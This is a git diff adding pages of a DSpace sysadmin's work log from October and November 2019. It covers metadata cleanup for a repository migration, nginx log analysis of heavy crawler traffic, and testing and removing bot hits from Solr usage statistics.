+  Detail: Key (bitstream_id)=(171221) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution, as always, is (repeat as many times as needed):</li>
+</ul>
+<pre tabindex="0"><code># su - postgres
+$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);&#39;
+UPDATE 1
+</code></pre><h2 id="2019-10-12">2019-10-12</h2>
+<ul>
+<li>More work on identifying duplicates in the Bioversity migration data on DSpace Test
+<ul>
+<li>I mapped twenty-five more items on CGSpace and deleted them from the migration test collection on DSpace Test</li>
+<li>After a few hours I think I finished all the duplicates that were identified by Atmire&rsquo;s Duplicate Checker module</li>
+<li>According to my spreadsheet there were fifty-two in total</li>
+</ul>
+</li>
+<li>I was preparing to check the affiliations on the Bioversity records when I noticed that the last list of top affiliations I generated has some anomalies
+<ul>
+<li>I made some corrections in a CSV:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>from,to
+CIAT,International Center for Tropical Agriculture
+International Centre for Tropical Agriculture,International Center for Tropical Agriculture
+International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
+International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
+International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
+&#34;Agricultural Information Resource Centre, Kenya.&#34;,&#34;Agricultural Information Resource Centre, Kenya&#34;
+&#34;Centre for Livestock and Agricultural Development, Cambodia&#34;,&#34;Centre for Livestock and Agriculture Development, Cambodia&#34;
+</code></pre><ul>
+<li>Then I applied it with my <code>fix-metadata-values.py</code> script on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f from -m 211 -t to
+</code></pre><ul>
+<li>I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
+<ul>
+<li>I would still like to perhaps (re)move institutional authors from <code>dc.contributor.author</code> to <code>cg.contributor.affiliation</code>, but I will have to run that by Francesca, Carol, and Abenet</li>
+<li>I could use a custom text facet like this in OpenRefine to find authors that likely match the &ldquo;Last, F.&rdquo; pattern: <code>isNotNull(value.match(/^.*, \p{Lu}\.?.*$/))</code></li>
+<li>The <code>\p{Lu}</code> is a cool <a href="https://www.regular-expressions.info/unicode.html">regex character class</a> to make sure this works for letters with accents</li>
+<li>As cool as that is, it&rsquo;s actually more effective to just search for authors that have &ldquo;.&rdquo; in them!</li>
+<li>I&rsquo;ve decided to add a <code>cg.contributor.affiliation</code> column to 1,025 items based on the logic above where the author name is not an actual person</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-13">2019-10-13</h2>
+<ul>
+<li>More cleanup work on the authors in the Bioversity migration
+<ul>
+<li>Now I sent the final feedback to Francesca, Carol, and Abenet</li>
+</ul>
+</li>
+<li>Peter is still seeing some authors listed with &ldquo;|&rdquo; in the &ldquo;Top Authors&rdquo; statistics for some collections
+<ul>
+<li>I looked in some of the items that are listed and the author field does not contain those invalid separators</li>
+<li>I decided to try doing a full Discovery re-indexing on CGSpace (linode18):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    82m35.993s
+</code></pre><ul>
+<li>After the re-indexing the top authors still list the following:</li>
+</ul>
+<pre tabindex="0"><code>Jagwe, J.|Ouma, E.A.|Brandes-van Dorresteijn, D.|Kawuma, Brian|Smith, J.
+</code></pre><ul>
+<li>I looked in the database to find authors that had &ldquo;|&rdquo; in them:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE &#39;%|%&#39;;
+            text_value            | resource_id 
+----------------------------------+-------------
+ Anandajayasekeram, P.|Puskur, R. |         157
+ Morales, J.|Renner, I.           |       22779
+ Zahid, A.|Haque, M.A.            |       25492
+(3 rows)
+</code></pre><ul>
+<li>Then I found their handles and corrected them, for example:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;157&#39; and handle.resource_type_id=2;
+  handle   
+-----------
+ 10568/129
+(1 row)
+</code></pre><ul>
+<li>So I&rsquo;m still not sure where these weird authors in the &ldquo;Top Author&rdquo; stats are coming from</li>
+</ul>
+<h2 id="2019-10-14">2019-10-14</h2>
+<ul>
+<li>I talked to Peter about the Bioversity items and he said that we should add the institutional authors back to <code>dc.contributor.author</code>, because I had moved them to <code>cg.contributor.affiliation</code>
+<ul>
+<li>Otherwise he said the data looks good</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-15">2019-10-15</h2>
+<ul>
+<li>I did a test export / import of the Bioversity migration items on DSpace Test
+<ul>
+<li>First export them:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
+$ mkdir 2019-10-15-Bioversity
+$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
+$ sed -i &#39;/&lt;dcvalue element=&#34;identifier&#34; qualifier=&#34;uri&#34;&gt;/d&#39; 2019-10-15-Bioversity/*/dublin_core.xml
+</code></pre><ul>
+<li>It&rsquo;s really stupid, but for some reason the handles are included even though I specified the <code>-m</code> option, so after the export I removed the <code>dc.identifier.uri</code> metadata values from the items</li>
+<li>Then I imported a test subset of them in my local test environment:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -c 10568/104049 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s /tmp/2019-10-15-Bioversity
+</code></pre><ul>
+<li>I had forgotten (again) that the <code>dspace export</code> command doesn&rsquo;t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import&hellip;</li>
+<li>On CGSpace I will increase the RAM of the command line Java process for good luck before import&hellip;</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
+</code></pre><ul>
+<li>After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them</li>
+</ul>
+<h2 id="2019-10-21">2019-10-21</h2>
+<ul>
+<li>Re-sync the DSpace Test database and assetstore with CGSpace</li>
+<li>Run system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+<h2 id="2019-10-24">2019-10-24</h2>
+<ul>
+<li>Create a test user for Mohammad Salem to test depositing from MEL to DSpace Test, as the last one I had created in 2019-08 was cleared when we re-syncronized DSpace Test with CGSpace recently.</li>
+</ul>
+<h2 id="2019-10-25">2019-10-25</h2>
+<ul>
+<li>Give a presentationa (via WebEx) about open source software to the ILRI Open Access Week
+<ul>
+<li>The title was <em>Making ILRI code open: Software as an International Public Good</em></li>
+<li>It is available on CGSpace: <a href="https://hdl.handle.net/10568/105514">https://hdl.handle.net/10568/105514</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-28">2019-10-28</h2>
+<ul>
+<li>Move the CGSpace CG Core v2 notes from a <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">GitHub Gist</a> to a <a href="/cgspace-notes/cgspace-cgcorev2-migration/">page</a> on this site for archive and searchability sake</li>
+<li>Work on the CG Core v2 implementation testing
+<ul>
+<li>I noticed that the page title is messed up on the item view, and after over an hour of troubleshooting it I couldn&rsquo;t figure out why</li>
+<li>It seems to be because the <code>dc.title</code>→<code>dcterms.title</code> modifications cause the title metadata to disappear from DRI&rsquo;s <code>&lt;pageMeta&gt;</code> and therefore the title is not accessible to the XSL transformation</li>
+<li>Also, I noticed a few places in the Java code where <code>dc.title</code> is hard coded so I think this might be one of the fields that we just assume DSpace relies on internally</li>
+<li>I will revert all changes to <code>dc.title</code> and <code>dc.title.alternative</code></li>
+<li>TODO: there are similar issues with the <code>citation_author</code> metadata element missing from DRI, so I might have to revert those changes too</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-29">2019-10-29</h2>
+<ul>
+<li>After more digging in the source I found out why the <code>dcterms.title</code> and <code>dcterms.creator</code> fields are not present in the DRI <code>pageMeta</code>&hellip;
+<ul>
+<li>The <code>pageMeta</code> element is constructed in <code>dspace-xmlui/src/main/java/org/dspace/app/xmlui/wing/IncludePageMeta.java</code> and the code does not consider any other schemas besides DC</li>
+<li>I moved title and creator back to the original DC fields and then everything was working as expected in the pageMeta, so I guess we cannot use these in DCTERMS either!</li>
+</ul>
+</li>
+<li>Assist Maria from Bioversity with community and collection subscriptions</li>
+</ul>
+<!-- raw HTML omitted -->
+
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-11/index.html b/docs/2019-11/index.html
new file mode 100644
index 000000000..53fcf190b
--- /dev/null
+++ b/docs/2019-11/index.html
@@ -0,0 +1,746 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2019" />
+<meta property="og:description" content="2019-11-04
+
+Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+
+I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:
+
+
+
+# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+1277694
+
+So 4.6 million from XMLUI and another 1.2 million from API requests
+Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
+
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
+106781
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-11/" />
+<meta property="article:published_time" content="2019-11-04T12:20:30+02:00" />
+<meta property="article:modified_time" content="2019-11-28T17:30:45+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2019"/>
+<meta name="twitter:description" content="2019-11-04
+
+Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+
+I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:
+
+
+
+# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+1277694
+
+So 4.6 million from XMLUI and another 1.2 million from API requests
+Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
+
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
+106781
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-11/",
+  "wordCount": "3457",
+  "datePublished": "2019-11-04T12:20:30+02:00",
+  "dateModified": "2019-11-28T17:30:45+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-11/">
+
+    <title>November, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-11/">November, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-11-04T12:20:30+02:00">Mon Nov 04, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-11-04">2019-11-04</h2>
+<ul>
+<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+<ul>
+<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+1277694
+</code></pre><ul>
+<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
+<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
+106781
+</code></pre><ul>
+<li>The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | awk &#39;{print $6}&#39; | sed &#39;s/&#34;//&#39; | sort | uniq -c | sort -n
+      1 PUT
+      8 PROPFIND
+    283 OPTIONS
+  30102 POST
+  46581 HEAD
+4594967 GET
+</code></pre><ul>
+<li>Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#39;(34\.224\.4\.16|34\.234\.204\.152)&#39;
+365288
+</code></pre><ul>
+<li>Their user agent is one I&rsquo;ve never seen before:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)
+</code></pre><ul>
+<li>Most of them seem to be to community or collection discover and browse results pages like <code>/handle/10568/103/discover</code>:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -o -E &#34;GET /(bitstream|discover|handle)&#34; | sort | uniq -c
+   6566 GET /bitstream
+ 351928 GET /handle
+# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c discover
+214209
+# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c browse
+86874
+</code></pre><ul>
+<li>As far as I can tell, none of their requests are counted in the Solr statistics:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true&#39;
+</code></pre><ul>
+<li>Still, those requests are CPU intensive so I will add their user agent to the &ldquo;badbots&rdquo; rate limiting in nginx to reduce the impact on server load</li>
+<li>After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1/discover&#39; User-Agent:&#34;Amazonbot/0.1&#34;
+</code></pre><ul>
+<li>On the topic of spiders, I have been wanting to update DSpace&rsquo;s default list of spiders in <code>config/spiders/agents</code>, perhaps by dropping a new list in from <a href="https://github.com/atmire/COUNTER-Robots">Atmire&rsquo;s COUNTER-Robots</a> project
+<ul>
+<li>First I checked for a user agent that is in COUNTER-Robots, but NOT in the current <code>dspace/config/spiders/example</code> list</li>
+<li>Then I made some item and bitstream requests on DSpace Test using that user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
+$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
+$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;iskanie&#34;
+</code></pre><ul>
+<li>A bit later I checked Solr and found three requests from my IP with that user agent this month:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0&#39;
+&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
+&lt;response&gt;
+&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;1&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;3&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
+&lt;/response&gt;
+</code></pre><ul>
+<li>Now I want to make similar requests with a user agent that is included in DSpace&rsquo;s current user agent list:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
+$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
+$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;celestial&#34;
+</code></pre><ul>
+<li>After twenty minutes I didn&rsquo;t see any requests in Solr, so I assume they did not get logged because they matched a bot list&hellip;
+<ul>
+<li>What&rsquo;s strange is that the Solr spider agent configuration in <code>dspace/config/modules/solr-statistics.cfg</code> points to a file that doesn&rsquo;t exist&hellip;</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>spider.agentregex.regexfile = ${dspace.dir}/config/spiders/Bots-2013-03.txt
+</code></pre><ul>
+<li>Apparently that is part of Atmire&rsquo;s CUA, despite being in a standard DSpace configuration file&hellip;</li>
+<li>I tried with some other garbage user agents like &ldquo;fuuuualan&rdquo; and they were visible in Solr
+<ul>
+<li>Now I want to try adding &ldquo;iskanie&rdquo; and &ldquo;fuuuualan&rdquo; to the list of spider regexes in <code>dspace/config/spiders/example</code> and then try to use DSpace&rsquo;s &ldquo;mark spiders&rdquo; feature to change them to &ldquo;isBot:true&rdquo; in Solr</li>
+<li>I restarted Tomcat and ran <code>dspace stats-util -m</code> and it did some stuff for awhile, but I still don&rsquo;t see any items in Solr with <code>isBot:true</code></li>
+<li>According to <code>dspace-api/src/main/java/org/dspace/statistics/util/SpiderDetector.java</code> the patterns for user agents are loaded from any file in the <code>config/spiders/agents</code> directory</li>
+<li>I downloaded the COUNTER-Robots list to DSpace Test and overwrote the example file, then ran <code>dspace stats-util -m</code> and still there were no new items marked as being bots in Solr, so I think there is still something wrong</li>
+<li>Jesus, the code in <code>./dspace-api/src/main/java/org/dspace/statistics/util/StatisticsClient.java</code> says that <code>stats-util -m</code> marks spider requests by their IPs, not by their user agents&hellip; WTF:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>else if (line.hasOption(&#39;m&#39;))
+{
+    SolrLogger.markRobotsByIP();
+}
+</code></pre><ul>
+<li>WTF again, there is actually a function called <code>markRobotByUserAgent()</code> that is never called anywhere!
+<ul>
+<li>It appears to be unimplemented&hellip;</li>
+<li>I sent a message to the dspace-tech mailing list to ask if I should file an issue</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-05">2019-11-05</h2>
+<ul>
+<li>I added &ldquo;alanfuu2&rdquo; to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu1&#34;
+$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu2&#34;
+</code></pre><ul>
+<li>After committing the changes in Solr I saw one request for &ldquo;alanfuu1&rdquo; and no requests for &ldquo;alanfuu2&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
+$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
+$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
+</code></pre><ul>
+<li>So basically it seems like a win to update the example file with the latest one from Atmire&rsquo;s COUNTER-Robots list
+<ul>
+<li>Even though the &ldquo;mark by user agent&rdquo; function is not working (see email to dspace-tech mailing list) DSpace will still not log Solr events from these user agents</li>
+</ul>
+</li>
+<li>I&rsquo;m curious how the special character matching is in Solr, so I will test two requests: one with &ldquo;<a href="https://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="https://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnip.com&#34;
+$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnyp.com&#34;
+</code></pre><ul>
+<li>Then commit changes to Solr so we don&rsquo;t have to wait:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
+$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound 
+  &lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
+$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
+</code></pre><ul>
+<li>So the blocking seems to be working because &ldquo;www.gnip.com&rdquo; is one of the new patterns added to the spiders file&hellip;</li>
+</ul>
+<h2 id="2019-11-07">2019-11-07</h2>
+<ul>
+<li>CCAFS finally confirmed that they do indeed need the confusing new project tag that looks like a duplicate
+<ul>
+<li>They had proposed a batch of new tags in 2019-09 and we never merged them due to this uncertainty</li>
+<li>I have now merged the changes in to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/432">#432</a>)</li>
+</ul>
+</li>
+<li>I am reconsidering the move of <code>cg.identifier.dataurl</code> to <code>cg.hasMetadata</code> in CG Core v2
+<ul>
+<li>The values of this field are mostly links to data sets on Dataverse and partner sites</li>
+<li>I opened an <a href="https://github.com/AgriculturalSemantics/cg-core/issues/10">issue on GitHub</a> to ask Marie-Angelique for clarification</li>
+</ul>
+</li>
+<li>Looking into CGSpace statistics again
+<ul>
+<li>I searched for hits in Solr from the BUbiNG bot and found 63,000 in the <code>statistics-2018</code> core:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;62944&#34; start=&#34;0&#34;&gt;
+</code></pre><ul>
+<li>Similar for com.plumanalytics, Grammarly, and ltx71!</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
+*com.plumanalytics*&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;28256&#34; start=&#34;0&#34;&gt;
+$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;6288&#34; start=&#34;0&#34;&gt;
+$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;105663&#34; start=&#34;0&#34;&gt;
+</code></pre><ul>
+<li>Deleting these seems to work, for example the 105,000 ltx71 records from 2018:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
+$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
+</code></pre><ul>
+<li>I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
+<ul>
